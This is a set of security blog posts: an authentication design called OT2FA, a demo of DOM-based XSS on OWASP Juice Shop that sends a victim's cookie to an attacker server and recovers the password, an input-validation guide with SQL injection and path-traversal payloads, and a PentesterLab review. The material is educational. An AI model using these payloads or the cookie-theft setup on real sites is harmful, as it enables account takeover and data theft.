The idea is simple: the first time a user logs in from a new user agent (i.e. browser or client software), require them to prove their identity via two-factors: their password, and a secret code that is emailed or SMSed to them (note: email is preferable as SMS security is known to be weak). When the user succeeds in proving the identity, provide a digitally signed token, such as a JWT, back to the user agent: “User X signed in from this device before.” Instead of the actual user name, something like a UUID should be used for the identity, which is tied to the username inside the server database. The token, called a OT2FA token, serves the purpose of marking that user agent trusted for that user. For web browsers, it is particularly convenient to store it in a cookie.

The next time that same user logs in from that user agent, they only need to provide the username and password, and the OT2FA token is sent up transparently to the user as the second factor proof of identity. The server authenticates the user by verifying the username and password are correct, the digital signature on the OT2FA token is valid, and the identity of the user in the OT2FA token maps to the username provided. If all are correct, access is granted without requiring a 2FA challenge from the user. In other words, the second factor challenge to the user happens only the first time he logs in from a particular user agent, and then the user never sees the second factor challenge on that user agent again. Hence the name: One-Time Two Factor Authentication.

This protection is not perfect, but it is a huge improvement in security at little impact to the user. The main thing is that it stops the large scale password guessing attacks: an attacker can only succeed against a user if he not only knows the username and password, but he also can crack the second factor or somehow get the user’s OT2FA token. If we make the assumption that no attacker is going to collect a large number of user OT2FA tokens (discussed further in the Potential Concerns section below), then we would believe that we have stopped the large scale password guessing attacks.

For emphasis, OT2FA is designed only to prevent password guessing attacks against users. There is no need to challenge the user for a second factor when they sign up for an account – new users should get an OT2FA token by default.

Below, we will discuss enhancements and then potential security concerns, but let’s first review where we are. In the context of password guessing attacks, Username/password-only is low security, but very usable. Two factor authentication is high security, but scores low on the usability scale. OT2FA is not as secure as 2FA nor as user-friendly as Username/password-only, but is not bad in either category, and could arguably considered good in both. Therefore OT2FA is a realistic security option for websites built with a strong emphasis on usability.


There are a many directions that one can go to enhance this idea.

For example, by including a unique identifier for each OT2FA token and storing the corresponding value in the database, you can give users the option to revoke OT2FA tokens living on trusted devices / user agents that should no longer be trusted for that user. So although you cannot make the OT2FA token go away, you can enforce on the server side that the specific OT2FA token being sent up is one that the user has not revoked. Some subtleties are discussed in Footnote 1 at the bottom.

Alternatively to maintaining server side state for revocation purposes, one could expire the OT2FA token. Indeed, many implementations (gmail, Lastpass, Azure DevOps, etc…) do this with a fixed expiry, and ask the user for a new 2FA challenge on a regular basis. The problem with expiring the token after a fixed interval is that it no longer meets the “one time” requirement for this design.

A more user-friendly approach to fixed token expiry is to set an initial expiry, but generate a new token with extended expiry each time the user returns. This mimics how “remember me” functionality is often implemented. If a user’s OT2FA token becomes known to an attacker, the user’s only defence then is his password, which needs to be strong enough to prevent the attacker from getting in until the compromised OT2FA token expires.  Although less than ideal, attackers are largely limited in the number of accounts they can go after assuming that there is no mass OT2FA token leakage.

Another direction is that OT2FA can be combined with (temporary) account lockout. Different failed password attempts thresholds can be allowed depending upon whether or not a valid OT2FA token is present. For example, one can impose a temporary lockout when the OT2FA token is not present, but still allow logins when the OT2FA token is present – provided that the second (higher) threshold for failed password attempts is not reached. This allows legitimate users, coming from trusted user agents, in easily while preventing hackers from getting in at the same time. It also mitigates the risk of an attacker trying to lock out a legitimate user from his account.

Another idea is allowing more than one user to login from a user agents for shared devices/computers. However there is a risk of over-engineering the implementation for limited benefit.

One can also consider a number of options to rolling this out smoothly, so it becomes as transparent as possible when the technology is first adopted by a company to their existing user base. There are many approaches for that, which would be too much of a tangent to expound upon here.

Aside: Clarification on Tokens

OT2FA tokens should not be confused with session ids or session tokens.

Session ids/tokens are high value and relatively short lived.  If an attacker captures a session token, he then can hijack the victim’s account.

OT2FA tokens are long-lived tokens and are insufficient for hijacking an account.  OT2FA tokens serve one purpose: to limit the ability of a hacker to perform password guessing attacks on user accounts.

Potential Concerns

The implementation may leak the validity of the password: The most straightforward way of implementing this is to only challenge for the second factor after the the username and password are confirmed. Note that if it is not implemented this way, then the user would (under some implementation assumptions) get notified every time somebody malicious tries an incorrect password for that user, which would be annoying and a cause of unnecessary stress to the user.

The fact that the validity of the password is leaked is not necessarily a bad thing. In fact, depending upon the wording of the email/SMS with the 2nd factor code, it may be a good thing because it alerts the user that there is good reason to change your password. For example, a notice like:

A new device has attempted to login to your account! If this is you, please click this link to prove your identity.
If this was not you, then it means that somebody has your password. Don’t panic: we have protected access to your account. However, we recommend that you change your password to prevent this person from continuing to attempt to access your account.”

Remark: The academic research papers mentioned above are more sophisticated than OT2FA, and attempt to hide the validity of the password (See Section 4 of Pinkas and Sander paper). But they do so using captchas, which we consider a no-no for usability and accessibility reasons. Not to mention that machines seem to be better than humans at captchas nowadays, which defeats the whole point of the technology.

Brute forcing the second factor: When a hacker gets the username and password correct, he can then focus his attention on brute forcing the second factor. This is only practical for the attacker if the second factor is brute force-able (for example, a 6-letter code), in which case it needs to be prevented in some way. For example, for too many wrong second factor guesses, impose a temporary account lockout for devices that do not have a valid OT2FA token for that user. The length of the time for locking the account should be dependent upon the the time to brute force the second factor challenge, and the user should be notified of the lockout via email or SMS.

Private browsing: For those who use private/incognito browsing, they may be forced to do 2FA every time because the OT2FA token does not persist on the client device. Allowing security and privacy conscious individuals to opt-out is one compensating control to address this.

Public/shared computers: You would not want to store the OT2FA token on a shared computer, because this would allow a hacker to capture it and then brute force the password without the second factor challenge. The first defence is to allow the user to click “shared computer” upon login, which will prevent the token from being stored on it. Having a revocation mechanism (see enhancements section) is a second defence.

Stolen OT2FA token: One way to reduce the risk of cookie theft is to make cookies httpOnly. But this alone cannot be relied upon, since there are a number of ways cookies may leak – not to mention that you might not even be using cookies for storing the token.

If the OT2FA token is stolen, it reduces to the security of password-only for that user – assuming the attacker knows to whom the token belongs. Having a revocation mechanism (as described above) is a compensating control.

Mass OT2FA token leakage: If there is mass token theft, then the security reduces to password-only under the assumption that the attacker can somehow map each token to each username. Usernames should not be put in tokens, instead unique identifiers should be stored there that are mapped to the user via the database. If the attacker is able to brute force a large number of these, it implies that the attacker not only has the tokens but also the map between the token and the user. This is a bad situation, and it requires a serious response from the owners of the website. The recommended action is to roll the key that is used for signing the OT2FA token, which means each user has to perform the OT2FA on each of their user agents again.

User loses access to email: If the user loses access to the email address that the second factor authentication requests is sent to, then he cannot add a new user agent as trusted. However, if the user has one already trusted user agent, he can use that one to update his email address on the system, thus working around the problem. When a user’s email address is changed, an email should be sent to the previous address to make sure this did not happen maliciously. There are other controls that can be added to reduce the risk of a hacker who succeeding in defeating the OT2FA from locking out a user from his account.


Is this the same as OWASP page on device cookies? No. It is similar, but the OWASP description gives out device cookies upon valid username/password without requiring the second factor authentication. As mentioned on the OWASP page, it does not stop password spraying attacks like OT2FA does. It also cites the source as Marc Heuse and Alec Muffett, whose discussions on the topic came years after the research cited at the top of this blog.

Is it just risk based authentication? Risk based authentication was first described in Enhanced Authentication In Online Banking by Gregory D. Williamson in 2006, which we cited at the beginning. The document recommends a number of ideas for enhance security, such as:

Machine Authentication, or PC fingerprinting, is a developing and widely used form of authentication (FFIEC, 2005). This type of authentication uses the customer’s computer as a second form of authentication (PassMark Security, n.d.). Machine authentication is the process of gathering information about the customer’s computer, such as serial numbers, MAC addresses of parts in the computer, system configuration information, and other identifying information that is unique to each machine. A profile is then built for the user and the machine. The profile is captured and stored on the machine for future use by the authentication system (PassMark Security, n.d.). Once the PC fingerprint is gathered, the system knows what machine attributes should be present when the user attempts to access their online bank account (Entrust, 2005). This type of authentication usually requires the user to register the machine at first sign on. If a customer logs in from another computer the system will know to further scrutinize the login attempt. At this point the system can prompt for additional authentication, such as out of band authentication or shared secret questions.”

The concepts here are very similar to the description of OT2FA except they use device fingerprinting instead of digital signatures to identify devices. Indeed, if one Googles for risk based authentication, many websites (example) talk about device fingerprints without mentioning the concept of digital signatures.

Device fingerprints are less preferable than digital signatures. Through reverse engineering, one is able to determine what device properties are used for the fingerprint. Depending upon exact details, this could potentially be used by a hacker to brute force the fingerprint of a victim once he knows the password. In contrast, brute forcing a cryptographic digital signature is not practical assuming that the crypto is done correctly.

In general, OT2FA is a special case of risk based authentication. It is a particularly simple and strong way of implementing the concept.


When security does not have an adequate answer, we often transfer the burden to the user. Putting too much burden on the user is bad security practice, as it violates the important security principle of pyschological acceptability.

In regard to login security, complex passwords, password rotation, captchas, 2FA, etc… are all poor solutions for a general audience due to the burden they put on users. Users resoundingly reject these ideas and technologies for day-to-day online activities, so something better is needed.

OT2FA is a practical tradeoff between security and usability. It offers much stronger than username/password-only security at very little usability impact. It can also fairly easily be implemented by any organisation. Most importantly, it is a realistic/practical solution for stopping large scale password guessing attacks without significantly burdening users.


Footnote 1: If one takes the unique identifier in the OT2FA token for revocation purposes approach, the use of server side persistent storage can change the whole implementation: rather than using digital signatures on the tokens, instead store a copy of each non-revoked token for each user on server side persistent storage.  When a user logs in with a OT2FA token, a simple verification that that token is in the server side database for that user takes the place of any digital signature check.  The major downside of this approach is that it requires more storage: one token for each device for each user, and any user could potentially generate a large number of them for himself using automated means.  If this is considered a threat, then obvious mitigating controls can be put in place.


The author would like to thank Dharshin De Silva for feedback on a preliminary version of this document.

Demonstrating Reflected versus DOM Based XSS

Update January 2019: Recent changes to the heroku Juice Shop app have broken this demo.  I may update the demo and the blog at a later time.

In my employment, I am responsible for making sure developers produce secure code, and security education is a key part of reaching this goal.  There are many ways that one can approach security education, but one thing that I have found is that developers really appreciate seeing how attacks are performed and exploited in practice, so hacking demonstrations and workshops have so far been a hit.

In doing these demonstrations, I have found two intentionally insecure test sites that have very similar cross site scripting (XSS) vulnerabilities – Altoro Mutual and OWASP Juice Shop. In fact, on the surface the vulnerabilities look identical, but under the hood they are different: Altoro Mutual has a reflected XSS whereas the Juice Shop has DOM-based XSS. It turns out that DOM-based XSS is much more convenient to demonstrate in a corporate environment for a few reasons, and in general more favourable to an attacker.

In this blog, I explain why and show you how to build a really cool demo of exploiting the OWASP Juice Shop DOM-based XSS. You will need a malicious server for the demo, but I have the code and a sample server all ready for your convenience. The demo uses the malicious server to steal the victim’s cookie, and from there we are able to retrieve his password. Full details below.


If you are not familiar with XSS, this section is for you. Everyone else, skip to the good stuff below.

XSS is when attacker can have his own JavaScript executing from somebody else’s website, and in particular from one or more victim user browsers.

The most famous XSS attack that I know of is the “Samy is my Hero” MySpace worm.  Although not as malicious as it could have been, Samy Kamkar created a script on MySpace that would send Samy a friend request and copy the script on the victim’s MySpace profile, along with displaying the string “but most of all, samy is my hero” on their profile. Within 20 hours, Samy had over one million friend requests.

The Samy worm was a persistent XSS, which means the script was permanently stored in the database. Persistent XSS vulnerabilities are the worst kind because everyone becomes vulnerable just by visiting the site.

Two other XSS types are reflected and DOM-based, which you will learn about in good detail by reading this blog. These are both less severe than persistent because the victim needs to be tricked into hitting the vulnerability (i.e. social engineering), but we will see that the consequences can be pretty bad for those who fall victim.  I have not seen any comparison of the severity of the two, but below I make the argument that DOM-based is more serious than reflected.

The Two Vulnerabilities

Let’s start with Altoro Mutual. In the search bar, you can type a script, for example a simple alert(“hello”) surrounded by <script> open and close tag:altoro_searchUpon hitting enter, you might see that the script executes (reflected XSS):altoro_mutual_xssHowever, you also might not see this. For example, if you try running it in a corporate environment, then the company proxy might have stopped it (one of the problems I ran into). If you use Chrome, you might have found that Chrome blocked it (one of the problems that the audience ran into when trying it — see screenshot below). There are workarounds for both cases, but it blunts the point of the severity of the issue when it only works in special cases.chrome_blocks_reflected.pngNow let’s try the exact same thing in OWASP Juice Shop. Type in your script in the search bar:juice_searchUpon hitting enter, I’m quite sure you will see this (DOM-based XSS):juice_xss In my case, neither the corporate proxy nor Chrome blocked it. There is a good reason for that.

Looking Closer

Let’s first confirm that the Altoro Mutual vulnerability is really reflected XSS and the OWASP Juice Shop is really DOM-based. We do that by sending communications through your favourite intercepting proxy. For Altoro Mutual, it looks like this:reflected_altoroWe see that the script entered in the search bar was reflected back as part of the html.
Now do the same with the Juice Shop:dom_juice_shopIt was not reflected back.

You can look further. If you open up your browser developer tools, you will see that the search value gets put into the html via client-side JavaScript. Inside the default Juice Shop html there is an input form which contains:


The ng-model is AngularJS functionality. AngularJS by default escapes content to prevent XSS, unless you code your JavaScript in a really dumb way, which was intentionally done for the Juice Shop:

r.searchQuery = t.trustAsHtml(

The trustAsHtml is an Angular method that does not do the default escaping.

Corporate proxies and browsers (Firefox currently does not) can easily block reflected XSS by checking whether the string sent contains a script and looking to see if the exact same string comes back. They can stop the hack as it is happening.

The same protection does not happen for DOM-based XSS. The attack happens entirely in the browser, which prevents corporate proxies from stopping it. It is a lot trickier for a browser to stop this type of attack than it is for one to stop reflected XSS.

Demonstrating Real Exploitation of DOM-based XSS

Although one can explain to developers and business people the dangers of XSS, nothing is more convincing than a real demonstration, and the OWASP Juice Shop is perfect for this. In our demonstration, we need a malicious server. I have created one for you that you can deploy in a couple minutes on Heroku: see github link. To speed things up, you can use my temporary server (to be taken down later).

In our demo, assume a user has logged into the OWASP Juice Shop. The user visits a malicious website that has a link promising free juice if you click it. Clicking the link triggers an XSS that takes the victim’s cookie and sends it to a “/recorddata” endpoint on the malicious server. From there, the attacker can hit a “/dumpdata” endpoint to display the captured cookies. The cookies contain JWTs, which when decoded, contain the MD5 hash of the user password (very dumb design, but I have seen worse in real code that was not intentionally insecure). Using Google dorking, the MD5 hash can be inverted to recover the victim’s password. Full details below.

First head over to the OWASP Juice Shop and click Login. From there, you can register. See Figure below:01_login_juiceFrom there you create the account of your victim user:02_create_accountNext, the victim logs in:03_victim_loginAll is fine and dandy, until somebody tells the victim of a website that offers free juice to OWASP Juice Shop customers. What could be better! The victim rushes to the site (for our temporary deployment, link is: clicking the link, the DOM-based XSS is triggered. A nontechnical user would likely not understand that a script has executed from the malicious site. In fact, in this case, the script has taken the victim’s cookie and sent it to the malicious website. The malicious website has a “/recorddata” endpoint that records the cookie in a temporary file (a more serious implementation would use a database).05_link_clickedOur malicious server also has a “/dumpdata” endpoint for displaying all the captured cookies (here for our temporary server).06_retrieve_cookie
Inside the cookie is a JWT. Let’s copy that JWT into our clip board:07_copy_cookieAnd now head over to where we can paste the token in and decode it:08_jwt_decodedAmazing! The username and password are in the cookie. But that’s not the real password, so what is it? Let’s Google it:09_google_dorkingAnd clicking the first link, we find out that it was the MD5 hash of the password. The real password is revealed in the link:10_get_password


I have found that rather than teach boring coding guidelines, developers much prefer to see security vulnerabilities and how they are exploited in practice. Once they learn the problems, they find a way to code them properly.  You know, developers are very good at using Google to find answers once they understand the problem they are trying to solve.

The OWASP Juice Shop is a great website for demonstrating security vulnerabilities, but in some cases you need to add your own parts to make the demo complete. In this blog, we provided the malicious server that executes a DOM-based XSS when a user clicks a link, which allows the attacker to recover the user’s password. The Juice Shop DOM-based XSS is much more convenient to demonstrate exploitation than the reflected XSS in Altoro Mutual.

For those familiar with CVSS for rating security vulnerabilities, the rating includes an attack complexity parameter to indicate whether special conditions need to exist for the attack to be successful. For reflected XSS, two special conditions were mentioned above: the victim’s browser would need to not defend against the attack (most browsers will stop it) and the victim needs to be in an environment where the attack would not be blocked. For DOM-based, it appears that there are no special conditions (browsers will not block the DOM-based attacks, and environment is irrelevant for this attack to work). Hence, DOM-based XSS are more favourable to attackers than reflected XSS, the difference being the complexity of pulling off the attack. Therefore, DOM-based XSS is more severe than reflect XSS, but less severe than persistent.

Secure Coding: Understanding Input Validation

Developers are often provided with a large amount of security advice, and it is not always clear what to do, how to do it, and how important it is. Especially considering that security advice has changed over time, it can be confusing. I was motivated to write this blog because the best guide I found on input validation is very dated, and I wanted to provide clear, modern guidance on the importance of the topic.  There is also the OWASP Input Validation Cheat Sheet as another source on this topic.

This blog is targeted to developers and Application Security leads who need to provide guidance to developers on best practices for secure coding.

Input validation the first line of defence for secure coding. There are many ways that a hacker will go after your software, and it would be naive to assume that you know all of them. The point of input validation is that, when done correctly, it will stop a number of attacks that you will not foresee. When it doesn’t completely stop them, it usually makes them more restricted or more difficult to pull off. Remember: input validation is not about stopping specific attacks, but instead a general defence for stopping any number of attacks.

Input validation is not hard to do, but sometimes it takes time to figure out what character set the data should conform to. This blog will be primarily focused on web applications, but the same concepts apply in other scenarios.

Below is guidance on how to do it, when to do it, and examples of how input validation might save you if you got other parts of the coding wrong. It must be emphasised that input validation is not a panacea, but when done correctly, it sure makes your application a lot more likely to resist a number of attacks.

What is input validation?

Hackers attack websites by sending malicious inputs. This could be through a web form or AJAX request, or by sending requests directly to your API with tools such a curl or python, or by using an intercepting proxy (typically burp, but other tools include zap and charles) which is somewhere in between the former two methods.

Input validation means to check on the server side that the input supplied by the user/attacker is of the form that you expect it to be. If it is not of the right form, then the data should be rejected, typically with a 400 http status code.

What is meant by right form? At the minimum, there should be a check on the length of the data, and the set of characters in the data. Sometimes, there are more specific restrictions on the data — consider some insightful examples below.

Example: phone number. A phone number is primarily digits, with a maximum of 15 digits. If you allow international numbers, then plus (‘+’) is a valid character. If the area code is in parentheses, then the parentheses are additionally valid characters. If you want to allow the user to enter dashes or spaces, then you can add those to the list of allowed character as well, though you don’t need to (front end developers can make it so that the user does not need to send such data). In total we have at most 15 different valid characters and at most 15 digits — this is your validation rule. Additionally, you should always have a limit on the total length of the string supplied (including parentheses, spaces, dashes, pluses) to stop malicious users from fiddling.

Example: last name. This one is more complicated, but a Google search gives us a pretty good answer. Importantly, you need to allow hyphens (Hector Sausage-Hausen); spaces, commas, and full stops (Martin Luther King, Jr.); and single quotes (Mathias d’Arras). See also the comments that identify extra characters that should be included if one wants to truly try to accept all international names, but it depends upon your application. As for length limit, if you really want to allow the longest names in the world, you can, but I would personally think a limit like 40 characters is sufficient.

Example: email address. Email addresses are examples where there character set is well defined, but the format is restricted. There are published regular expressions all over the web that tell you how to validate email addresses, but this one looks quite useful because it tells you how to do it in many different languages.

Example: a quantity. A common requirement for ecommerce applications is to allow the customer to choose some number of items. Quantities should be positive integers, and there should be some reasonable upper limit to how many the person can choose. For example, you might allow only the quantities 0, 1, 2, …, 99 and anything else is rejected.

There are two types of input validation strategies: white list and black list. The examples above are white list — we have said exactly what is allowed and anything else is rejected. The alternative approach, black list, tells what is not allowed and accepts everything else. White list validation is a general defence that is not targeted towards a specific attack, and can often stop attacks that you may not foresee. On the other hand, black list validation rules out dangerous characters for a specific attack that you have in mind. Black list should never be relied upon by itself — we will talk more about that in the next section.

When and how to do it?

Validation must happen on the server side, and should be done before you do anything else with the data.

It’s not unusual to see client side validation (for usability), but if you do not also validate on the server side (for security), then it will stop your kid sister and nobody else. Remember, web hackers do not need to run the same JavaScript code that you serve to them. Most of the time, they are going to use an intercepting proxy to modify the request after it leaves the browser but before it reaches the server. For example, see this video.  [Footnote: there are some edge cases where client side input validation makes sense for security, such as DOM based XSS, but these are advanced topics that are beyond the scope of this blog.]

What should be validated? Any data that you use that an attacker can manipulate. For web applications, this includes query parameters, http body data, and http headers. For emphasis, you don’t need to validate every http header — instead, only validate the ones that your application uses somewhere in the code. I’ve seen a number of cases where applications use http headers such as User-Agent without realising that an attacker could put anything he wants for such values. For example, with curl one would just use the -H option.

Validation should be done immediately, before anything else (including logging) is done with the data. I’ve seen cases where developers tried to validate strings that were formed by concatenating fixed values with user input. Because the validation happened on the result of the string concatenation, the validation routine had to be liberal enough to allow every character in the fixed string. But one of the characters in the fixed string was key to allowing the attacker to supply his own malicious input. Since the validation had to allow it when coded this way, a hack was trivial to pull off.

MVC frameworks such as .Net and Spring have good documentation on how to do input validation. For example, Microsoft has nice pages about input validation in various versions of ASP.NET MVC. Similarly, Spring has documentation and additional guidance can be found in various places.  In other cases, you might use a framework design specifically for data validation, or write custom validation methods.

Importantly, white list validation must always be done. Black list validation can supplement white list validation, but it cannot be relied upon by itself to stop an attack. The reason is that hackers are very good at finding ways around black list validation.

Yes, it is your responsibility

The diagram below depicts an example that I have seen a number of times, especially in microservices architectures.  System A receives data from the user, and passes it off to internal System B.  System B processes the data.  Where should input validation happen?


The developers of System A believe they are mainly acting as a proxy, and therefore the responsibility for input validation lies with System B.  On the other hand, the developers of System B believe they are getting data from an internal trusted source (System A), and therefore the responsibility for validating it lies with System A.  As a consequence, neither development team validates the data.  In the event that they get hacked, everyone has an excuse on why they didn’t do it.

The answer is that both are responsible for validating their input data.

System A needs to validate because otherwise it is vulnerable to various injection attacks when the data gets sent to system B, such as json injection or http header injection.  System B should validate their data because the muppets who wrote System A rarely do any type of meaningful validation on the data you process.  In summary, no matter where you are developing, you need to validate your input.  Don’t assume that somebody else is going to do it for you, because they won’t.

What about input sanitisation?

Sanitisation refers to changing user input so that it becomes not dangerous. The issue here is that what is dangerous depends upon the context in which it is used.

For example, suppose some user input is first logged and then later displayed to the user in his browser. In the context of logging, dangerous characters are new lines (ASCII value of 10) and carriage returns (ASCII value of 13) because they allow attackers to create a new line of your log file with anything he wants, an attack known as log forging (log forging discussed in more detail when we get to examples later). On the other hand, when it is displayed to the user, the dangerous characters become those that can be interpreted by the browser to do something that is not intended by the web designer — the characters < > / and “ are the first that come to mind (normally we escape these characters).

It is not unusual for developers to get this wrong.  I have seen more than once the use of the OWASP Java HTML Sanitizer to attempt to sanitise data written to the log.  Wrong tool, wrong context.

Because sanitisation depends upon context, it is not desirable to try to sanitise inputs at the beginning in such a way that they will not be dangerous when later used. In other words, input sanitisation should never be used in replace of input validation. Input validation should always be done.  Thus, even if you get the sanitisation wrong (e.g. see previous paragraph), input validation will often save you.

Note also that the concept of input sanitisation is making us think in a black list approach rather than a white list approach, i.e. we are thinking about what characters might be harmful in a specific context and what to do with them. This is another reason why input sanitisation should not displace input validation. Even very good developers  have learned this the hard way.

The bottom line is that white list input validation is a general defence, whereas input sanitisation is a specific defence. General defences should happen when input comes in (at “source”), specific defences should happen when the data is later used (at “sink”). Never omit the general defence.


We have given the guidance, but now let’s justify it with examples. Let’s see how input validation can often save us when proper coding defences are lacking somewhere else in the code base. An important takeaway here is that even though input validation does not stop everything, it certainly does stop a lot, and makes other attacks a lot harder. Given how easy it is to perform the validation, the bang-for-your-buck-analysis dictates to always do it.

Example: SQL injection

SQL injection vulnerabilities are most often due to forming SQL queries using string concatenation/substitution with user input. A typical example looks like this (Java):

String query = 'SELECT * FROM User where userId='' + request.getParameter('userId') + ''';  // vulnerable

To get all users, the attacker can send the following for the userId parameter: xyz’ or 1=1 –.
That malicious input will change the query to:

SELECT * FROM User where userId='xyz' or 1=1 -- '

The attacker can do much more than this with more clever inputs, including fetching other columns or deleting the entire database. However, sticking to the simple example, notice the tools the attacker is using: the single quote to end the userId part of the query, the white spaces to add other statements, the equal to make a comparison that is always true, and the double dash to escape the remaining part of the query.

The proper defence against SQL injection, which should always be done, is either prepared statements or parameterised queries. However, let’s consider what would happen if the developer had validated the input but still formed the query with string concatenation.  In this case, the code might look like:

// This code is still wrong, but it is better than above
String userId = request.getParameter('userId');
if ( !validateUserId( userId ) )
    // Handle error condition, return status code of 400
String query = 'SELECT * FROM User where userId='' + userId + '''; // <--- Don't do this!

For data types like user ids, phone numbers, quantities, email addresses, and many others, input validation would not have allowed the single quote, which has already stopped the attack. However, for a field like a last name, a single quote must be allowed or else O’Malley will throw a fit.

Still, input validation would not have allowed the equal character in the last name and some other characters that attackers like to use. Additionally, limiting the number of characters that an attacker can provide (example: 40 for last name) would also impede the attacker. Truthfully, a good hacker would still succeed in getting an injection, but you might have stopped the script kiddie. The lesson here is: Just because you validated the data does not mean that you can be sloppy elsewhere.

A great website telling how to code sql queries in various languages is Bobby Tables. They have a nice comic, but unfortunately the punch line is wrong:


As the website, correctly says on the about page: The answer is not to “sanitize your database inputs” yourself. It is prone to error. Instead, use prepared statements or parameterised queries.

Example: Log forging

A well written application should have logging throughout the code base. But logging user input can lead to problems. For example (C#):

log.Info("Value requested is " + Request["value"]); // vulnerable

Log files are separated by newlines or carriage returns, so if the value from the user contains a newline or a carriage return, then the user is able to put anything he wants into your log file, and it will be very hard for you to distinguish between what is real versus what was written by the attacker. If you did proper validation of your input, there are not many cases where one would allow newlines and/or carriage returns, so the validation would usually save you.

For a good technique to prevent log forging, see this nice blog by John Melton (the same concept works regardless of language).

Example: Path manipulation

Many web applications these days allow the user to upload to or read something from the server file system. It is not unusual for the file name to be formed by concatenating a fixed path with a file name provided by the user (C#):

String fn = Request["filename"]; // fn could have dangerous input
String filepath = USER_STORAGE_PATH + fn;
String[] lines = System.IO.File.ReadAllLines(filepath); // vulnerable

The above example does not validate the user provided filename, but normally a filename would only allow alphanumeric characters along with the ‘.’ for file extensions.

The risk here is that a user provides a file name of something like: ../../../system_secrets.txt (fictional file name). This allows the attacker to read the system_secrets.txt file which is outside the USER_STORAGE_PATH path. Note that the input validation would not have prohibited the use of ‘.’ , but it would have prevented from using the forward or backward slash, which is key to his success.

More generally, I don’t recommend that users should be able to provide the direct file names to access, and storage should be on a separate system. But even if you go against that advice, proper input validation will save you from path manipulation.

Example: Server side request forgery

This is a nice example because not many people know what it is, but it has recently become quite a nice tool that hackers have added to their toolbox.

Consider that your web application might initiate an http request, where the destination of that request is somehow formed from user input. One might think that making the http request from the server is benign, because it is no different from the user making a similar request from his browser. But that reasoning is wrong, because the request from your server has access to your internal network, whereas the user himself should not.

An example is insightful. The website InterviewCake teaches developers how to solve difficult job interview questions. From the website, you can actually write code in a number of different languages and run it, which runs in an AWS environment. It was then too easy for Christophe Tafani-Dereeper to write some simple python code on InterviewCake that reveals AWS security credentials from the private network that the application was hosted on:


This type of attack is common in AWS environments: learn about AWS Instance Metadata from Amazon.

Of course, allowing users to run arbitrary code in an environment that you host is extremely dangerous and is hard to defend against. More often we see cases like the following from StackOverflow (PHP):


In the above example, the server will get the url of a file from a query parameter.  It assumes that the file type is either gif, png, or jpg, and then it servers that content to the client.  The only validation check is that the protocol is http (or https).

Although it appears to restrict to gif, png, or jpg files, the default is to just read the content regardless of type. An attacker could thus request anything he wants, and the command is executed with server privileges.

To fix it, the server needs to validate that the incoming url is allowed to be accessed by the user. This can be done by verifying that the url matches a white list of allowed URLs. In this case, white list validation defeats the attack completely (when implemented properly), and no other defence is needed.

Example: Cross site scripting

Cross site scripting (XSS) is an old vulnerability that is still a major problem today. There are three types of XSS, but we’re not going to that level of detail. XSS happens when untrusted input (typically user input) is interpreted in a malicious way in another user’s browser. Let’s look at a simple example (Java JSP):

<% String name = request.getParameter("name"); %>
Name provided: <%= name %>

If the input provided contains the query parameter


then that JavaScript will execute in a user’s browser. This type of XSS (reflected XSS) is typically exploited by user A emailing a link to user B with the malicious JavaScript embedded in it.

The proper defence for XSS is to escape the untrusted input. In JSP, this can be done with the JSTL <c:out> tag or fn:escapeXml(). But this needs to happen everywhere untrusted data is displayed, and missing one place can result in a critical security vulnerability.

Similar to other examples, input validation will often save you in the event that you missed a single place where the output needs to be escaped. As noted above, the characters < > / and ” are particularly dangerous in the context of html. These characters are rarely part of a while list of allowed user input.

Despite the dire warnings above, it is great to know that there are frameworks like Angular that escape all inputs by default, thus making XSS extremely unlikely to happen in that framework. Secure by default — what a novel concept.


White list input validation should always be done because it prevents a number of attacks that you may not foresee. This technique should happen as soon as data comes in, and invalid input should be rejected without further consideration. Input validation is not a panacea, so it should be coupled with specific defences that are relevant to the context in which the data is used. Input validation should be applied at the source, whereas the other specific defences are applied at the data sinks.

A Review of PentesterLab


After completing my fourth badge on PentesterLab, I have enjoyed it so much that I thought I would pass on the word on what a great learning resource it is. If I had to summarise it in one sentence, I would say an extremely well written educational site about web application pentesting that caters to all skill levels and makes it easy to learn at an incredibly affordable price (US$20 per month for pro membership, and there is no minimum number of months or annoying auto-renewal in signup). If you are uncertain whether it is for you, start by checking out the free content.

Without pro membership, you can still download many ISOs and try the exercises yourself locally. However with the pro membership will you get more content and you do not have the overhead time of downloading ISOs, spinning up VMs, and related activities.

This blog is about what you will get out of it and what you should know going in. In my opinion, the best way to do justice in describing PentesterLab is to talk about some of the exercises on the site. So at the end of the blog, I dive down into the technical fun stuff, describing three of my favourites. If none of those exercises pique your interest, then never mind!

For the record, I have no connection to the site author, Louis Nyffenegger. I have never met him, but I have exchanged a few emails with him in regard to permission to blog about his site. My opinion is thus unbiased — my only interest is blogging about things that I am passionate about, and PentesterLab has really worked for me.

What you can expect to learn

A few examples of what you can expect to learn from PentesterLab:

  • An introduction to web security, through any of the Web for Pentesters courses or Essential badge or the Introduction badge or the bootcamp.
  • Advanced penetration testing that often leads to web shells and remoted code execution, in the White badge, Serialize badge, Yellow badge, and various other places. Examples of what you get to exploit include Java deserialization (and deserialization in other languages), shell shock, out of band XXE, recent Struts 2 vulnerabilities (CVE-2017-5638), and more.
  • The practical experience of breaking real world cryptography through exercises such as Electronic Code Book, Cipher Block Chaining, Padding Oracle, and ECDSA. Note: Although the number of crypto exercises here cannot compete with CryptoPals (which is exclusively about breaking real world cryptography), at least at PentesterLab you get certifications (badges) as evidence of your acquired skills.
  • Practical experience bypassing crypto when there is no obvious way to break it, such as in API to shell, Json web token, and Jason web token II.
  • Practical experience performing increasingly sophisticated man-in-the-middle attacks in the Intercept badge.
  • Fun challenges that will really make you think in the Capture the flag badge.

The author is updating the site all the time, and it is clear that more badges and exercises are on the way.

In addition to learning lots of new attacks on web applications, I can also say that I personally picked up a few more skills that I was not expecting:

  • Learning some functionality of Burp suite that I had not known existed. I thought I knew it well before I started, but it turns out that there were a number of little things that I did not know, often picked up by watching the videos (only available via pro membership).
  • Learning more about various types of encoding and how to do it in the language I choose (in my case, Python). The Python functionality I needed was not given to me from the site, but I was drawn to learn it as I was trying to solve various challenges. For example, I now know how the padding works in base64 (which is important because not all of the encodings I got from challenges were directly feedable into Python), and I learned about the very useful urllib.quote.
  • Getting confidence in fiddling with languages that I had little experience in, such as PHP and Ruby.

What you should know going in

